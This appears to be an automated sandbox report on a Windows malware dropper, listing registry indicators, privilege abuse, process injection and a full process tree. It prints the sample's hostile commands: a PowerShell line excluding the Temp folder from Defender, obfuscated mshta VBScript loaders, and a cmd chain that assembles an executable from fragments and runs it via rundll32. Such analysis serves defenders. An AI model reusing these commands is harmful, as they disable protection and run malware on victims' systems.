Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | cmd.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | PlREWOPKJ6dQLCAu2xyyr7tT.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe

Kills process with taskkill 5 IoCs
Processes:
pid | process
5172 | taskkill.exe
4560 | taskkill.exe
1896 | taskkill.exe
4340 | taskkill.exe
3692 | taskkill.exe

Modifies data under HKEY_USERS 46 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | sihclient.exe
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 | msiexec.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | sihclient.exe
Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | sihclient.exe
Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\7\52C64B7E | msiexec.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8 | msiexec.exe
Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | sihclient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | sihclient.exe
Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E | svchost.exe

Modifies registry class 5 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ |
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ |
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ |
Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ |
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ |

Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | installer.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = [value removed] | installer.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | installer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process
5000 | Fri10d184202996a0d7f.exe (2 occurrences)
4548 | powershell.exe (2 occurrences)
4752 | Fri10584c049c7f.exe (60 occurrences)

Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
pid | process
3220 8176 | foldershare.exe

Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
pid | process
1688 | e3pqPskkJwLs8LEChQJEssCE.exe
3960 | 2987.exe

Suspicious behavior: SetClipboardViewer 6 IoCs
Processes:
pid | process
6856 | 1696741.scr
5244 | 3436754.scr
1640 | 3689896.scr
6324 | 4873741.scr
7516 | 2785272.scr
5852 | 3932054.scr

Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description | pid | process
Token: SeCreateTokenPrivilege | 5148 | Fri10720d229511df563.exe
Token: SeAssignPrimaryTokenPrivilege | 5148 | Fri10720d229511df563.exe
Token: SeLockMemoryPrivilege | 5148 | Fri10720d229511df563.exe
Token: SeIncreaseQuotaPrivilege | 5148 | Fri10720d229511df563.exe
Token: SeMachineAccountPrivilege | 5148 | Fri10720d229511df563.exe
Token: SeTcbPrivilege | 5148 | Fri10720d229511df563.exe
Token: SeSecurityPrivilege | 5148 | Fri10720d229511df563.exe
Token: SeTakeOwnershipPrivilege | 5148 | Fri10720d229511df563.exe
Token: SeLoadDriverPrivilege | 5148 | Fri10720d229511df563.exe
Token: SeSystemProfilePrivilege | 5148 | Fri10720d229511df563.exe
Token: SeSystemtimePrivilege | 5148 | Fri10720d229511df563.exe
Token: SeProfSingleProcessPrivilege | 5148 | Fri10720d229511df563.exe
Token: SeIncBasePriorityPrivilege | 5148 | Fri10720d229511df563.exe
Token: SeCreatePagefilePrivilege | 5148 | Fri10720d229511df563.exe
Token: SeCreatePermanentPrivilege | 5148 | Fri10720d229511df563.exe
Token: SeBackupPrivilege | 5148 | Fri10720d229511df563.exe
Token: SeRestorePrivilege | 5148 | Fri10720d229511df563.exe
Token: SeShutdownPrivilege | 5148 | Fri10720d229511df563.exe
Token: SeDebugPrivilege | 5148 | Fri10720d229511df563.exe
Token: SeAuditPrivilege | 5148 | Fri10720d229511df563.exe
Token: SeSystemEnvironmentPrivilege | 5148 | Fri10720d229511df563.exe
Token: SeChangeNotifyPrivilege | 5148 | Fri10720d229511df563.exe
Token: SeRemoteShutdownPrivilege | 5148 | Fri10720d229511df563.exe
Token: SeUndockPrivilege | 5148 | Fri10720d229511df563.exe
Token: SeSyncAgentPrivilege | 5148 | Fri10720d229511df563.exe
Token: SeEnableDelegationPrivilege | 5148 | Fri10720d229511df563.exe
Token: SeManageVolumePrivilege | 5148 | Fri10720d229511df563.exe
Token: SeImpersonatePrivilege | 5148 | Fri10720d229511df563.exe
Token: SeCreateGlobalPrivilege | 5148 | Fri10720d229511df563.exe
Token: 31 | 5148 | Fri10720d229511df563.exe
Token: 32 | 5148 | Fri10720d229511df563.exe
Token: 33 | 5148 | Fri10720d229511df563.exe
Token: 34 | 5148 | Fri10720d229511df563.exe
Token: 35 | 5148 | Fri10720d229511df563.exe
Token: SeDebugPrivilege | 4628 | sfx_123_206.exe
Token: SeDebugPrivilege | 3564 | Fri10b0a06a73706.exe
Token: SeDebugPrivilege | 4548 | powershell.exe
Token: SeDebugPrivilege | 5172 | taskkill.exe
Token: SeDebugPrivilege | 3840 | DownFlSetup110.exe
Token: SeDebugPrivilege | 5816 | 1223505.scr
Token: SeIncBasePriorityPrivilege | 5732 | mshta.exe
Token: SeDebugPrivilege | 5732 | mshta.exe
Token: SeLoadDriverPrivilege | 5732 | mshta.exe
Token: SeDebugPrivilege | 5692 | cmd.exe
Token: SeRestorePrivilege | 884 | WerFault.exe
Token: SeBackupPrivilege | 884 | WerFault.exe
Token: SeCreateTokenPrivilege | 6472 | ICL5tqbRIE9gecc0WfBQzYV0.exe
Token: SeAssignPrimaryTokenPrivilege | 6472 | ICL5tqbRIE9gecc0WfBQzYV0.exe
Token: SeLockMemoryPrivilege | 6472 | ICL5tqbRIE9gecc0WfBQzYV0.exe
Token: SeIncreaseQuotaPrivilege | 6472 | ICL5tqbRIE9gecc0WfBQzYV0.exe
Token: SeMachineAccountPrivilege | 6472 | ICL5tqbRIE9gecc0WfBQzYV0.exe
Token: SeTcbPrivilege | 6472 | ICL5tqbRIE9gecc0WfBQzYV0.exe
Token: SeSecurityPrivilege | 6472 | ICL5tqbRIE9gecc0WfBQzYV0.exe
Token: SeTakeOwnershipPrivilege | 6472 | ICL5tqbRIE9gecc0WfBQzYV0.exe
Token: SeLoadDriverPrivilege | 6472 | ICL5tqbRIE9gecc0WfBQzYV0.exe
Token: SeSystemProfilePrivilege | 6472 | ICL5tqbRIE9gecc0WfBQzYV0.exe
Token: SeSystemtimePrivilege | 6472 | ICL5tqbRIE9gecc0WfBQzYV0.exe
Token: SeProfSingleProcessPrivilege | 6472 | ICL5tqbRIE9gecc0WfBQzYV0.exe
Token: SeIncBasePriorityPrivilege | 6472 | ICL5tqbRIE9gecc0WfBQzYV0.exe
Token: SeCreatePagefilePrivilege | 6472 | ICL5tqbRIE9gecc0WfBQzYV0.exe
Token: SeCreatePermanentPrivilege | 6472 | ICL5tqbRIE9gecc0WfBQzYV0.exe
Token: SeBackupPrivilege | 6472 | ICL5tqbRIE9gecc0WfBQzYV0.exe
Token: SeRestorePrivilege | 6472 | ICL5tqbRIE9gecc0WfBQzYV0.exe
Token: SeShutdownPrivilege | 6472 | ICL5tqbRIE9gecc0WfBQzYV0.exe

Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
pid  process
4644  setup_2.tmp
7056  ultramediaburner.tmp
5840  msedge.exe
2452  installer.exe
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid  process
3220
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description  pid  process  target process
PID 4944 wrote to memory of 4152  4944  setup_x86_x64_install.exe  setup_installer.exe
PID 4944 wrote to memory of 4152  4944  setup_x86_x64_install.exe  setup_installer.exe
PID 4944 wrote to memory of 4152  4944  setup_x86_x64_install.exe  setup_installer.exe
PID 4152 wrote to memory of 4164  4152  setup_installer.exe  setup_install.exe
PID 4152 wrote to memory of 4164  4152  setup_installer.exe  setup_install.exe
PID 4152 wrote to memory of 4164  4152  setup_installer.exe  setup_install.exe
PID 4164 wrote to memory of 4964  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 4964  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 4964  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 5028  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 5028  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 5028  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 1688  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 1688  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 1688  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 2088  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 2088  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 2088  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 3836  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 3836  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 3836  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 3864  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 3864  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 3864  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 5032  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 5032  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 5032  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 780  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 780  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 780  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 4984  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 4984  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 4984  4164  setup_install.exe  cmd.exe
PID 4964 wrote to memory of 4548  4964  cmd.exe  powershell.exe
PID 4964 wrote to memory of 4548  4964  cmd.exe  powershell.exe
PID 4964 wrote to memory of 4548  4964  cmd.exe  powershell.exe
PID 1688 wrote to memory of 4752  1688  cmd.exe  Fri10584c049c7f.exe
PID 1688 wrote to memory of 4752  1688  cmd.exe  Fri10584c049c7f.exe
PID 1688 wrote to memory of 4752  1688  cmd.exe  Fri10584c049c7f.exe
PID 4164 wrote to memory of 2248  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 2248  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 2248  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 716  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 716  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 716  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 1168  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 1168  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 1168  4164  setup_install.exe  cmd.exe
PID 5028 wrote to memory of 1320  5028  cmd.exe  Fri1034cd265b5e0adcd.exe
PID 5028 wrote to memory of 1320  5028  cmd.exe  Fri1034cd265b5e0adcd.exe
PID 5028 wrote to memory of 1320  5028  cmd.exe  Fri1034cd265b5e0adcd.exe
PID 3836 wrote to memory of 4736  3836  cmd.exe  Fri1015b9a4e0b.exe
PID 3836 wrote to memory of 4736  3836  cmd.exe  Fri1015b9a4e0b.exe
PID 3836 wrote to memory of 4736  3836  cmd.exe  Fri1015b9a4e0b.exe
PID 5032 wrote to memory of 3804  5032  cmd.exe  Fri1008c7d6874.exe
PID 5032 wrote to memory of 3804  5032  cmd.exe  Fri1008c7d6874.exe
PID 5032 wrote to memory of 3804  5032  cmd.exe  Fri1008c7d6874.exe
PID 2088 wrote to memory of 3564  2088  cmd.exe  Fri10b0a06a73706.exe
PID 2088 wrote to memory of 3564  2088  cmd.exe  Fri10b0a06a73706.exe
PID 4164 wrote to memory of 4348  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 4348  4164  setup_install.exe  cmd.exe
PID 4164 wrote to memory of 4348  4164  setup_install.exe  cmd.exe
PID 780 wrote to memory of 4628  780  cmd.exe  Fri103a7805577.exe
PID 780 wrote to memory of 4628  780  cmd.exe  Fri103a7805577.exe
Processes

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe  (depth 1)
  command line: "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
  - Suspicious use of WriteProcessMemory
  C:\Users\Admin\AppData\Local\Temp\setup_installer.exe  (depth 2)
    command line: "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\setup_install.exe  (depth 3)
      command line: "C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\setup_install.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\cmd.exe  (depth 4)
        command line: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (depth 5)
          command line: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
      C:\Windows\SysWOW64\cmd.exe  (depth 4)
        command line: C:\Windows\system32\cmd.exe /c Fri1034cd265b5e0adcd.exe
        - Suspicious use of WriteProcessMemory
        C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri1034cd265b5e0adcd.exe  (depth 5)
          command line: Fri1034cd265b5e0adcd.exe
          - Executes dropped EXE
          C:\Windows\SysWOW64\mshta.exe  (depth 6)
            command line: "C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri1034cd265b5e0adcd.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri1034cd265b5e0adcd.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )
            C:\Windows\SysWOW64\cmd.exe  (depth 7)
              command line: "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri1034cd265b5e0adcd.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri1034cd265b5e0adcd.exe" ) do taskkill -F -Im "%~nXU"
              C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe  (depth 8)
                command line: SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK
                - Executes dropped EXE
                C:\Windows\SysWOW64\mshta.exe  (depth 9)
                  command line: "C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )
                  C:\Windows\SysWOW64\cmd.exe  (depth 10)
                    command line: "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"
                C:\Windows\SysWOW64\mshta.exe  (depth 9)
                  command line: "C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )
                  C:\Windows\SysWOW64\cmd.exe  (depth 10)
                    command line: "C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM
                    C:\Windows\SysWOW64\cmd.exe  (depth 11)
                      command line: C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                      - Executes dropped EXE
                      - Suspicious use of AdjustPrivilegeToken
                    C:\Windows\SysWOW64\cmd.exe  (depth 11)
                      command line: C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"
                    C:\Windows\SysWOW64\control.exe  (depth 11)
                      command line: control .\FUEj5.QM
                      C:\Windows\SysWOW64\rundll32.exe  (depth 12)
                        command line: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM
                        - Loads dropped DLL
                        C:\Windows\system32\RunDll32.exe  (depth 13)
                          command line: C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM
                          C:\Windows\SysWOW64\rundll32.exe  (depth 14)
                            command line: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM
                            - Loads dropped DLL
              C:\Windows\SysWOW64\taskkill.exe  (depth 8)
                command line: taskkill -F -Im "Fri1034cd265b5e0adcd.exe"
                - Kills process with taskkill
                - Suspicious use of AdjustPrivilegeToken
      C:\Windows\SysWOW64\cmd.exe  (depth 4)
        command line: C:\Windows\system32\cmd.exe /c Fri10584c049c7f.exe
        - Suspicious use of WriteProcessMemory
        C:\Users\Admin\AppData\Local\Temp\7zS830B9DE0\Fri10584c049c7f.exe  (depth 5)
          command line: Fri10584c049c7f.exe
          - Executes dropped EXE
          - Suspicious behavior: EnumeratesProcesses
          C:\Users\Admin\Documents\Z_V3sMNGsvI7rRpfvw0QMyp6.exe  (depth 6)
            command line: "C:\Users\Admin\Documents\Z_V3sMNGsvI7rRpfvw0QMyp6.exe"
            - Executes dropped EXE
          C:\Users\Admin\Documents\aZ0YnrKtc10UIUgYsMgrAuZt.exe  (depth 6)
            command line: "C:\Users\Admin\Documents\aZ0YnrKtc10UIUgYsMgrAuZt.exe"
            - Executes dropped EXE
          C:\Users\Admin\Documents\0l0xrtpnHHTLm65menBbcuXf.exe  (depth 6)
